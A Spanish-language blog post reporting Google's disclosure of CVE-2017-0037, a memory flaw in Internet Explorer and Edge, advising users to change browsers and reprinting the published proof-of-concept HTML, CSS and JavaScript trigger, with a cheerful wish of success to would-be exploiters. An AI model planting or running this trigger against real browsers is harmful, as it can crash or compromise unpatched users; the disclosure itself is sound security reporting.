CVE-2017-0037: Vulnerabilidad de Ejecución de Código IE y MS edge

Al parecer el equipo de google esta haciendo nuevamente de las suyas, partimos con la liberación de la vulnerabilidad de SHA1 y ahora al liberar una vulnerabilidad de la plataforma microsoft sobre un error de los sistemas Internet Explorer y Microsoft Edge que permite a un atacante ejecutar codigo arbitraria sobre el sistema de la victima.

Lo peor de todo esto es que Micrsoft se le fue informado sobre esta vulnerabilidad pero aun no ha hecho nada, y tampoco ha liberado nuevos parches dentro el periodo de 90 dias que tiene google como politica de divulgación de vulnerabilidades.

Prueba de Conceptos

 

Los investigadores realizaron la POC sobre un sistema Windows 2012 R2, en el cual lograron bloquear la aplicación y a su vez abrir los puertos necesarios para poder realizar el ataque. Si vemos que la vulnerabilidad se logro ejecutar tambien en Internet Explorer, tenemos un ambito de victimas que abarca desde Windows 7, hasta Windows 10... Muy interesante.

Que hacer como Usuario??? 

 

Se recomienda dejar de utilizar estos navegadores ( Que comente quien aun lo hace hehe ) hasta que microsoft no libere los parches de resolución de esta vulnerabilidad, y comienze a utilizar otros navegadores del mercado.

Como explotar esta Vulnerabilidad?

 

 Particularmente no he probado este código... pero ya existe uno publicado en exploitdb, osea ya cualquier persona con conocimientos necesarios podria llegar a explotar esta vulnerbilidad

Acá adjunto el código y el link desarrollado por google para realizar esta poc... exito 



 <style>
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
 </style>
 <script>
function boom() {
  document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
  th1.align = "right";
}
 </script>
 <body onload="setInterval(boom,100)">
 <table cellspacing="0">
 <tr class="class1">
 <th id="th1" colspan="5" width=0></th>
 <th class="class2" width=0><div class="class2"></div></th>